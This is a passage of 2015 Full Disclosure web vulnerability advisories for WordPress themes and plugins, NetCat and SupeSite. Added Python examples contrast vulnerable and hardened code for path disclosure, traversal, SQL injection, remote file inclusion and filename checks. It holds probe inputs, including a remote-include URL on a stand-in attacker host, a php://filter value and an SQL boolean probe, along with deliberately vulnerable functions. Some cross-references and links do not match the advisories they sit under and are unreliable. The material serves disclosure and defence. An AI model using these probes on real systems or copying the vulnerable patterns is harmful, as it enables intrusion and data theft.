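_PHP_ERROR = re.compile(
    r"\b(?:Warning|Notice|Fatal error|Parse error|Deprecated)\s*:\s*"
    r"(?P<msg>.+?)\s+in\s+"
    r"(?P<path>(?:/|[A-Za-z]:\\)[^\s<>]+)"
    r"\s+on line\s+(?P<line>\d+)",
    re.DOTALL,
)


def disclosed_paths(body: str) -> List[Tuple[str, int, str]]:
    """Return (absolute path, line, message) for every PHP error in the body.
    Tags are stripped first because PHP wraps the path in <b>...</b>."""
    text = _TAGS.sub("", body)
    return [(m.group("path"), int(m.group("line")), m.group("msg").strip())
            for m in _PHP_ERROR.finditer(text)]


def web_root(path: str) -> str:
    """Directory part of a disclosed path: the installation root an attacker
    reuses in later file-read or file-write attempts."""
    sep = "\\" if "\\" in path else "/"
    return path.rsplit(sep, 1)[0]


def fpd_probes(param: str, original: str = "1") -> List[Tuple[str, str]]:
    """Request mutations that commonly make unguarded PHP emit a warning.
    Which one works depends on the code; the advisories do not say."""
    return [
        (param + "[]", original),   # array where a string is expected
        (param, ""),                # empty value
        (param, original + "'"),    # unbalanced quote / non-numeric value
    ]
```

The server-side remediation is the same for all three products: display_errors=Off in php.ini (with log_errors=On so the messages still reach the error log), and validating the parameters so that the warning is never raised in the first place.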


[FD] WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security Vulnerabilities

2015-03-07 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 Unrestricted Upload of File Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /thumb.php src
Parameter Unrestricted Upload of File Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Unrestricted Upload of File with Dangerous Type
[CWE-434]
CVE Reference: *
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
WooThemes



*Product & Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL & Download:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
The Daily Edition WordPress theme was developed by the WooThemes team. Daily
Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay.
With loads of home page modules to enable/disable and a unique
JavaScript-based featured scroller and video player, the theme oozes
sophistication.

The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the theme's
appearance and functions flexible. From the Daily Edition's 3 option pages
you can, for example, add your Twitter and Google Analytics code, some
custom CSS and footer content – and in the widgets area you find a practical
ads management.

Unique Features
These are some of the more unique features that you will find within the
theme:
- A neat JavaScript home page featured slider, with thumbnail previews of
  previous/next slides on hover over the dots.
- A “talking points” home page that can display posts according to tags,
  in order of most commented to least commented. A great way to highlight
  posts gathering dust in the archives.
- A customizable home page layout with options to specify how many full
  width blog posts and how many “box” posts you would like to display.
- A JavaScript home page video player with thumbnail hover effect.
- 16 delicious colour schemes to choose from!







*(2) Vulnerability Details:*
The WordPress Daily Edition Theme web application has a security bug.
It can be exploited by Unrestricted Upload of File (Arbitrary File
Uploading) attacks. With a specially crafted request, a remote attacker can
include arbitrary files from the targeted host or from a remote or local
host. This may allow disclosing file contents or executing files like PHP
scripts. Such attacks are limited due to the script only calling files
already on the target host.


*(2.1)* The code flaw occurs at the thumb.php? page with the src parameter.








*References:*
http://tetraph.com/security/unrestricted-upload-of-file-arbitrary/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-unrestricted-upload-of-file-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/4
http://packetstormsecurity.com/files/130653/Webshop-Hun-1.062S-Directory-Traversal.html







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

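Added example, not WooThemes code: the file-fetch behaviour the post describes for thumb.php?src=... (a script that opens whatever file on the host the src value names), beside the resolver an image thumbnailer should use instead. The directory layout and file names are constructed in a temporary directory so the block runs stand-alone; the function names are assumptions.

```python
import os
import tempfile
from typing import Dict, Optional, Tuple

ALLOWED_EXT = {".jpg", ".jpeg", ".png", ".gif"}


class RejectedSource(ValueError):
    """Raised by the hardened resolver for any src it will not open."""


def resolve_src_vulnerable(image_dir: str, src: str) -> str:
    """Assumed vulnerable behaviour: src is glued onto the image directory
    and opened as-is, so '../' segments walk out of it and an absolute src
    replaces the directory altogether."""
    return os.path.join(image_dir, src)


def resolve_src_fixed(image_dir: str, src: str) -> str:
    """Canonicalise first, then check: the result must stay inside image_dir,
    must carry an image extension and must be a regular file. The checks run
    on the resolved path, so doubled '../' and symlinks are covered too."""
    if not src or "\x00" in src:
        raise RejectedSource("empty src or NUL byte")
    root = os.path.realpath(image_dir)
    candidate = os.path.realpath(os.path.join(root, src))
    try:
        inside = os.path.commonpath([root, candidate]) == root
    except ValueError:          # different drives on Windows
        inside = False
    if not inside:
        raise RejectedSource("src escapes the image directory: %r" % src)
    if os.path.splitext(candidate)[1].lower() not in ALLOWED_EXT:
        raise RejectedSource("not an image file: %r" % src)
    if not os.path.isfile(candidate):
        raise RejectedSource("no such image: %r" % src)
    return candidate


def demo() -> Dict[str, Tuple[bool, Optional[str]]]:
    """Constructed layout: <tmp>/images/cat.jpg plus a secret <tmp>/wp-config.php
    one level up. For each src, report whether the vulnerable resolver lands on
    an existing file and what the fixed resolver returns (None = rejected)."""
    top = tempfile.mkdtemp()
    images = os.path.join(top, "images")
    os.mkdir(images)
    with open(os.path.join(images, "cat.jpg"), "wb") as fh:
        fh.write(b"\xff\xd8\xff\xe0")                     # JPEG header bytes
    with open(os.path.join(top, "wp-config.php"), "w") as fh:
        fh.write("<?php define('DB_PASSWORD', 'constructed-secret');")
    results = {}
    for src in ("cat.jpg", "../wp-config.php", "/etc/passwd"):
        reachable = os.path.isfile(resolve_src_vulnerable(images, src))
        try:
            fixed = resolve_src_fixed(images, src)
        except RejectedSource:
            fixed = None
        results[src] = (reachable, fixed)
    return results
```

The order of the checks matters: the containment test runs on the canonical path, so a value that only looks harmless as a string (for example one that reaches the parent through a symlink inside the image directory) is still caught.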

[FD] WordPress Daily Edition Theme v1.6.2 SQL Injection Security Vulnerabilities

2015-03-07 Thread Jing Wang
*WordPress Daily Edition Theme v1.6.2 SQL Injection Security
Vulnerabilities*


Exploit Title: WordPress Daily Edition Theme v1.6.2 /fiche-disque.php id
Parameters SQL Injection Security Vulnerabilities
Product: WordPress Daily Edition Theme
Vendor: WooThemes
Vulnerable Versions: v1.6.2
Tested Version: v1.6.2
Advisory Publication: Mar 07, 2015
Latest Update: Mar 07, 2015
Vulnerability Type: Improper Neutralization of Special Elements used in an
SQL Command ('SQL Injection') [CWE-89]
CVE Reference: *
Impact CVSS Severity (version 2.0):
CVSS v2 Base Score: 7.5 (HIGH) (AV:N/AC:L/Au:N/C:P/I:P/A:P) (legend)
Impact Subscore: 6.4
Exploitability Subscore: 10.0
Credit: Wang Jing [Mathematics, Nanyang Technological University (NTU),
Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*



*Vendor:*
WooThemes



*Product & Version:*
WordPress Daily Edition Theme
v1.6.2



*Vendor URL & Download:*
WordPress Daily Edition Theme can be obtained from here,
http://www.woothemes.com/products/daily-edition/



*Product Introduction:*
The Daily Edition WordPress theme was developed by the WooThemes team. Daily
Edition is a clean, spacious newspaper/magazine theme designed by Liam McKay.
With loads of home page modules to enable/disable and a unique
JavaScript-based featured scroller and video player, the theme oozes
sophistication.

The Daily Edition theme offers users many options, controlled from the
widgets area and the theme options page – it makes both the theme's
appearance and functions flexible. From the Daily Edition's 3 option pages
you can, for example, add your Twitter and Google Analytics code, some
custom CSS and footer content – and in the widgets area you find a practical
ads management.

Unique Features
These are some of the more unique features that you will find within the
theme:
- A neat JavaScript home page featured slider, with thumbnail previews of
  previous/next slides on hover over the dots.
- A “talking points” home page that can display posts according to tags,
  in order of most commented to least commented. A great way to highlight
  posts gathering dust in the archives.
- A customizable home page layout with options to specify how many full
  width blog posts and how many “box” posts you would like to display.
- A JavaScript home page video player with thumbnail hover effect.
- 16 delicious colour schemes to choose from!







*(2) Vulnerability Details:*
The WordPress Daily Edition Theme web application has a security bug.
It can be exploited by SQL Injection attacks. This may allow a remote
attacker to inject or manipulate SQL queries in the back-end database,
allowing for the manipulation or disclosure of arbitrary data.


*(2.1)* The code flaw occurs at the fiche-disque.php? page with the id
parameter.








*References:*
http://www.tetraph.com/security/sql-injection-vulnerability/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-daily-edition-theme-v162-sql.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
https://itswift.wordpress.com/2015/03/07/wordpress-daily-edition-theme-v1-6-2-sql-injection-security-vulnerabilities/
http://seclists.org/fulldisclosure/2015/Mar/27
http://packetstormsecurity.com/files/130075/SmartCMS-2-SQL-Injection.html






--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts

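Added example, not 724CMS or WooThemes code, covering both SQL injection advisories above: 724CMS index.php and section.php (Lang, ID) and the Daily Edition theme's fiche-disque.php (id). It builds the concatenated query the advisories describe against an in-memory SQLite table, shows what a text parameter and a numeric parameter each let an attacker do, and shows the parameterised form together with the boolean-based probe a tester uses to tell the two apart. The table, its rows, the placeholder hash and the function names are constructed for this demonstration.

```python
import sqlite3
from typing import Callable, List


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the CMS database (constructed rows; the hash is
    a placeholder, not a real credential)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        """
        CREATE TABLE sections(id INTEGER, lang TEXT, title TEXT, published INTEGER);
        INSERT INTO sections VALUES (1, 'en', 'Home', 1);
        INSERT INTO sections VALUES (2, 'en', 'Draft page', 0);
        INSERT INTO sections VALUES (3, 'fr', 'Accueil', 1);
        CREATE TABLE users(id INTEGER, name TEXT, password_hash TEXT);
        INSERT INTO users VALUES (1, 'admin', 'deadbeef00000000000000000000beef');
        """
    )
    return con


def section_vulnerable(con: sqlite3.Connection, lang: str, section_id: str) -> List[str]:
    """Assumed vulnerable query: both request values concatenated into SQL,
    the text one inside quotes and the numeric one bare."""
    sql = ("SELECT title FROM sections WHERE lang = '%s' AND id = %s AND published = 1"
           % (lang, section_id))
    return [row[0] for row in con.execute(sql)]


def section_fixed(con: sqlite3.Connection, lang: str, section_id: str) -> List[str]:
    """Parameterised form: values are bound, never parsed as SQL. The numeric
    parameter is also validated as an integer before the query is built."""
    if not section_id.isdigit():
        return []
    sql = "SELECT title FROM sections WHERE lang = ? AND id = ? AND published = 1"
    return [row[0] for row in con.execute(sql, (lang, int(section_id)))]


def boolean_probe(query: Callable[..., List[str]], con: sqlite3.Connection,
                  lang: str, section_id: str) -> bool:
    """Boolean-based confirmation a tester runs on a numeric parameter: the
    'AND 1=1' variant must return the baseline rows and the 'AND 1=2' variant
    none. Only an injectable parameter behaves that way."""
    baseline = query(con, lang, section_id)
    true_case = query(con, lang, section_id + " AND 1=1")
    false_case = query(con, lang, section_id + " AND 1=2")
    return bool(baseline) and true_case == baseline and false_case == []
```

Two payloads show the two parameter types: a quote in the text parameter Lang comments out the published filter and exposes unpublished rows, while a UNION appended to the bare numeric ID pulls rows from another table into the result. The boolean probe is the check to run first on a live target, since it needs no error output and works on both parameter types.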

[FD] Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-04 Thread Jing Wang
*Webshop hun v1.062S XSS (Cross-site Scripting) Security Vulnerabilities*


Exploit Title: Webshop hun v1.062S /index.php Multiple Parameters XSS
Security Vulnerabilities
Product: Webshop hun
Vendor: Webshop hun
Vulnerable Versions: v1.062S
Tested Version: v1.062S
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
Webshop hun


*Product & Version:*
Webshop hun
v1.062S


*Vendor URL & Download:*
Webshop hun can be downloaded from here,
http://www.webshophun.hu/index


*Product Introduction:*
Webshop hun is an online product selling web application system.

If our webshop you want to distribute your products, but it is too
expensive to find on the internet found solutions, select the Webshop Hun
shop program and get web store for free and total maker banner must display
at the bottom of the page 468x60 size. The download shop program, there is
no product piece limit nor any quantitative restrictions, can be used
immediately after installation video which we provide assistance.

The Hun Shop store for a free for all. In our experience, the most dynamic
web solutions ranging from our country. If the Webshop Hun own image does
not suit you, you can also customize the look of some of the images and the
corresponding text replacement, or an extra charge we can realize your
ideas. The Webshop Hun pages search engine optimized. They made the Hun
Shop web program to meet efficiency guidelines for the search engines. The
pages are easy to read and contain no unnecessary HTML tags. Any web page
is simply a few clicks away.





*(2) Vulnerability Details:*
Webshop hun has a web application security bug problem. It can be exploited
by XSS (Cross-site Scripting) attacks.


*(2.1)* The vulnerability occurs at the index.php? page with the param,
center, lap, termid and nyelv_id parameters.






*References:*
http://tetraph.com/security/xss-vulnerability/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/webshop-hun-v1062s-xss-cross-site.html
http://www.inzeed.com/kaleidoscope/computer-web-security/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/webshop-hun-v1-062s-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2





--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] WordPress Max Banner Ads Plug-in XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-04 Thread Jing Wang
*WordPress Max Banner Ads Plug-in XSS (Cross-site Scripting) Security
Vulnerabilities*


Exploit Title: Wordpress Max Banner Ads Plugin /info.php zone_id
Parameter XSS Security Vulnerabilities
Product: Wordpress Max Banner Ads Plugin
Vendor: MaxBlogPress
Vulnerable Versions: 1.9  1.8   1.4   1.3.*   1.2.*   1.1   1.09
Tested Version: Check All Related Versions' Source Code
Advisory Publication: Mar 04, 2015
Latest Update: Mar 04, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
MaxBlogPress


*Product & Version:*
Wordpress Max Banner Ads Plugin
1.9   1.8   1.4   1.3.7   1.3.6   1.3.5   1.3.4   1.3.3   1.3.2   1.3.1
1.3
1.2.7   1.2.6   1.2.5   1.2   1.1   1.09



*Vendor URL & Download:*
Wordpress Max Banner Ads Plugin can be downloaded from here,
http://www.maxblogpress.com/plugins/


*Product Introduction:*
Easily add and rotate banners in your WordPress blog anywhere you like
without editing any themes or touching any code.





*(2) Vulnerability Details:*
Wordpress Max Banner Ads Plugin has a web application security bug
problem. It can be exploited by XSS (Cross-site Scripting) attacks.


*(2.1)* The vulnerability occurs at the info.php? page with the zone_id
parameter.







*References:*
http://tetraph.com/security/xss-vulnerability/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/03/wordpress-max-banner-ads-plug-in-xss.html
http://www.inzeed.com/kaleidoscope/computer-web-security/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/03/04/wordpress-max-banner-ads-plug-in-xss-cross-site-scripting-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts



[FD] NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*NetCat CMS Multiple Remote File Inclusion (RFI) Security Vulnerabilities*


Exploit Title: NetCat CMS Multiple Remote File Inclusion (RFI) Security
Vulnerabilities
Product: NetCat CMS (Content Management System)
Vendor: NetCat
Vulnerable Versions: 3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1
Tested Version: 3.12
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Filename for Include/Require
Statement in PHP Program ('PHP Remote File Inclusion') [CWE-98]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]







*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:*
NetCat


*Product & Version:*
NetCat
3.12   3.0   2.4   2.3   2.2   2.1   2.0   1.1


*Vendor URL & Download:*
NetCat can be downloaded from here,
http://netcat.ru/


*Product Introduction:*
NetCat.ru is a Russian local company. NetCat is designed to create the
absolute majority of site types: from a simple business card with minimal
content to complex web-based systems, from corporate offices to online
stores, libraries or media data - in other words, projects of completely
different directions and at any level of complexity. Examples of sites
running on NetCat CMS can be viewed in a special section.

Even an inexperienced user can manage a site based on NetCat, because it
does not require knowledge of Internet technologies, programming or markup
languages. NetCat is constantly improving and adds new features. In the
process of finalizing, the wishes of our partners and clients, as well as
trends in Internet development, are necessarily taken into account. More
than 2,000 studios and private web developers have chosen NetCat for their
projects, and in 2013 more than 18,000 sites were created that successfully
work on our CMS.





*(2) Vulnerability Details:*
NetCat has a security bug problem. It can be exploited by Remote File
Inclusion (RFI) attacks.

*(2.1)* The first vulnerability occurs at /eshop/index.php? page with
INCLUDE_FOLDER parameter.

*(2.2)* The second vulnerability occurs at add.php? page with
INCLUDE_FOLDER parameter.

*(2.3)* The third vulnerability occurs at netcat/index.php? page with
INCLUDE_FOLDER parameter.

*(2.4)* The fourth vulnerability occurs at s_loadenv.inc.php? page with
INCLUDE_FOLDER parameter.

*(2.5)* The fifth vulnerability occurs at *.pdf/index.php? page with
INCLUDE_FOLDER parameter.










*References:*
http://tetraph.com/security/remote-local-file-inclusion-vulnerability/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/netcat-cms-multiple-remote-file.html
http://www.inzeed.com/kaleidoscope/computer-security/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/netcat-cms-multiple-remote-file-inclusion-rfi-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts


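The five NetCat findings above share one root cause: a request parameter (INCLUDE_FOLDER) is used to decide which file the PHP interpreter includes. The block below is an added defensive example, not NetCat's code; the folder names, file layout and log labels are assumptions. It treats the parameter as an opaque key that must match a short allow-list, re-checks the resolved path against the application directory, and also offers a small classifier a defender can run over logged parameter values to label remote-URL, stream-wrapper and traversal probes.

```python
"""Safe resolution of an "include folder" request parameter.

Added example for the NetCat CMS RFI report above. Illustrative code, not
NetCat's; ALLOWED_FOLDERS and the demo file layout are assumptions.
"""
import re
import shutil
import tempfile
from pathlib import Path
from typing import Optional

# Hypothetical allow-list of include folders the application ships.
ALLOWED_FOLDERS = frozenset({"eshop", "netshop", "modules"})
# An include key is an identifier, never a path.
_KEY_RE = re.compile(r"[A-Za-z0-9_]{1,32}")
_WRAPPER_RE = re.compile(r"^(?:php|data|expect|phar|zip|glob|compress\.[a-z]+):",
                         re.IGNORECASE)
_REMOTE_RE = re.compile(r"^(?:[a-z][a-z0-9+.-]*:)?//", re.IGNORECASE)


def rfi_indicator(value: str) -> Optional[str]:
    """Label why a raw INCLUDE_FOLDER-style value looks hostile.

    Returns a short string for logging/alerting, or None when the value is
    at least shaped like a legitimate key."""
    if value is None:
        return None
    if "\x00" in value:
        return "null-byte"
    if _WRAPPER_RE.match(value):
        return "stream-wrapper"      # php://filter, data:, expect:, ...
    if _REMOTE_RE.match(value):
        return "remote-url"          # http://host/..., //host/...
    if ".." in value or value.startswith("/") or "\\" in value:
        return "traversal"
    if not _KEY_RE.fullmatch(value):
        return "malformed"
    return None


def resolve_include(base_dir, folder: str, filename: str = "config.inc.php") -> Path:
    """Map an allow-listed key to a file under base_dir, or raise."""
    reason = rfi_indicator(folder)
    if reason is not None:
        raise ValueError(f"rejected include folder ({reason})")
    if folder not in ALLOWED_FOLDERS:
        raise ValueError("unknown include folder")
    base = Path(base_dir).resolve()
    candidate = (base / folder / filename).resolve()
    # Even an allow-listed key is re-checked after resolution, so a planted
    # symlink cannot point the include outside the application directory.
    if base not in candidate.parents:
        raise ValueError("resolved path escapes application directory")
    if not candidate.is_file():
        raise FileNotFoundError(str(candidate))
    return candidate


def build_demo_tree() -> str:
    """Create a throwaway directory with one legitimate include (constructed)."""
    root = tempfile.mkdtemp(prefix="rfi-demo-")
    inc = Path(root, "eshop")
    inc.mkdir()
    (inc / "config.inc.php").write_text("<?php // demo config\n")
    return root


def demo() -> dict:
    """Run a few constructed parameter values through resolve_include."""
    root = build_demo_tree()
    results = {"eshop": resolve_include(root, "eshop").name}
    for probe in ("http://attacker.example/x.txt", "../../etc",
                  "php://filter/resource=index.php", "netshop", "eshop;x"):
        try:
            resolve_include(root, probe)
            results[probe] = "accepted"
        except (ValueError, FileNotFoundError) as exc:
            results[probe] = type(exc).__name__
    shutil.rmtree(root, ignore_errors=True)
    return results


if __name__ == "__main__":
    for value, outcome in demo().items():
        print(f"{value!r:40} -> {outcome}")
```

Note that "netshop" is on the allow-list yet fails with FileNotFoundError in the demo, because the check is on the resolved file, not on the key alone. A PHP deployment gets the same effect with a literal `switch` over known folder names plus `allow_url_include=Off`; the point is that the request value never reaches `include` as a path.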

[FD] Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities

2015-03-01 Thread Jing Wang
*Comsenz SupeSite CMS Arbitrary Code Execution Security Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS Arbitrary Code Execution Security
Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Improper Control of Generation of Code ('Code
Injection') [CWE-94]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]






*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:* Comsenz


*Product & Version:*
SupeSite 6.0.1UC
SupeSite 7.0


*Vendor URL & Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster can, through SupeSite, easily build a community
portal for Web2.0.

Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions.




*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Arbitrary Code
Execution attacks.


*(2.1)* The vulnerability occurs at the normal administrator CSS editor field.
If files such as a.php;a.css *.php;*.css are inserted, a normal
administrator can insert a webshell to control the backstage management system.









*References:*
http://tetraph.com/security/arbitrary-code-execution-vulnerability/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://securityrelated.blogspot.com/2015/02/comsenz-supesite-cms-arbitrary-code.html
http://www.inzeed.com/kaleidoscope/computer-security/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://diebiyi.com/articles/%E5%AE%89%E5%85%A8/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
https://itinfotechnology.wordpress.com/2015/02/25/comsenz-supesite-cms-arbitrary-code-execution-security-vulnerabilities/
http://lists.kde.org/?a=139222176300014&r=1&w=2







--
Wang Jing,
Division of Mathematical Sciences (MAS),
School of Physical and Mathematical Sciences (SPMS),
Nanyang Technological University (NTU),
Singapore.
http://www.tetraph.com/wangjing/
https://plus.google.com/u/0/+JingWang-tetraph-justqdjing/posts


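The SupeSite finding above turns on a filename such as a.php;a.css passing an extension check: a test that only looks at the final suffix accepts it, and some web servers stop parsing the name at the semicolon and hand the file to the PHP handler. The block below is an added example, not SupeSite's code; the naming policy and the style directory are assumptions. It contrasts the suffix-only check with an allow-list over the whole name and shows how the storage path is computed from the validated name.

```python
"""Strict filename validation for an admin stylesheet editor.

Added example for the SupeSite arbitrary-code-execution report above;
not SupeSite's code. The naming policy (bare name, .css only) is an
assumption chosen to make the allow-list easy to reason about.
"""
import re
from pathlib import Path
from typing import Dict, Iterable, Optional, Tuple

# Whole-name allow-list: one token of safe characters followed by ".css".
_CSS_NAME = re.compile(r"[A-Za-z0-9][A-Za-z0-9_-]{0,63}\.css")


def naive_is_css(name: str) -> bool:
    """The kind of check that fails: it only inspects the trailing suffix."""
    return name.lower().endswith(".css")


def strict_css_name(name: str) -> Optional[str]:
    """Return the name if it is a bare, well-formed CSS file name, else None.

    Because the whole string must match, separators such as ';', '/', '\\',
    NUL and any second extension are rejected without listing them."""
    if name is None or "\x00" in name:
        return None
    if not _CSS_NAME.fullmatch(name):
        return None
    return name


def storage_path(style_dir, name: str) -> Path:
    """Where a validated stylesheet is written; raises on any bad input.

    The directory is fixed by the server, and the resolved target must be a
    direct child of it, so a valid name can never land elsewhere."""
    safe = strict_css_name(name)
    if safe is None:
        raise ValueError("filename rejected")
    base = Path(style_dir).resolve()
    target = (base / safe).resolve()
    if target.parent != base:
        raise ValueError("filename escapes style directory")
    return target


def compare(names: Iterable[str]) -> Dict[str, Tuple[bool, bool]]:
    """Side-by-side verdicts (naive, strict) for a list of candidate names."""
    return {n: (naive_is_css(n), strict_css_name(n) is not None) for n in names}


if __name__ == "__main__":
    for name, (naive, strict) in compare(
            ["theme.css", "a.php;a.css", "../x.css", "A.CSS", "x.php"]).items():
        print(f"{name!r:16} naive={naive!s:5} strict={strict}")
```

The strict check deliberately refuses "A.CSS": a single canonical spelling keeps the handler mapping unambiguous. Where users genuinely need free-form names, keep the allow-list for the on-disk name and store the display name separately.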

[FD] Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security Vulnerabilities

2015-03-01 Thread Jing Wang
*Comsenz SupeSite CMS Reflected XSS (Cross-site Scripting) Security
Vulnerabilities*



Exploit Title: Comsenz SupeSite CMS /cp.php do parameter Reflected XSS
Security Vulnerabilities
Product: SupeSite CMS (Content Management System)
Vendor: Comsenz
Vulnerable Versions: 6.0.1UC   7.0
Tested Version: 7.0
Advisory Publication: Feb 25, 2015
Latest Update: Feb 25, 2015
Vulnerability Type: Cross-Site Scripting [CWE-79]
CVE Reference: *
Credit: Wang Jing [CCRG, Nanyang Technological University (NTU), Singapore]




*Advisory Details:*


*(1) Vendor & Product Description:*


*Vendor:* Comsenz


*Product & Version:*
SupeSite 6.0.1UC
SupeSite 7.0


*Vendor URL & Download:*
SupeSite can be downloaded from here,
http://www.comsenz.com/products/other/supesite
http://www.comsenz.com/downloads/install/supesite#down_open


*Source code:*
http://www.8tiny.com/source/supesite/nav.html?index.html


*Product Introduction:*
SupeSite is an independent content management (CMS) function, and
integrates Web2.0 community personal portal system X-Space, has a strong
aggregation of community portal systems. SupeSite station can be achieved
within the forum (Discuz!), personal space (X-Space) information content
aggregation. Any webmaster can, through SupeSite, easily build a community
portal for Web2.0.

Features include: information management, information dissemination,
information audit, information classification, information and other custom
fields, make your site easier to manage and maintain. Information
permissions and user group permissions combine owners can publish
information, management, audit and other permissions are set to different
groups of users, so that the specified user group has information
management functions.



*(2) Vulnerability Details:*
SupeSite has a security bug problem. It can be exploited by Reflected XSS
(Cross-site Scripting) attacks.


*(2.1)* The vulnerability occurs at the cp.php? page with the do parameter.










*References:*
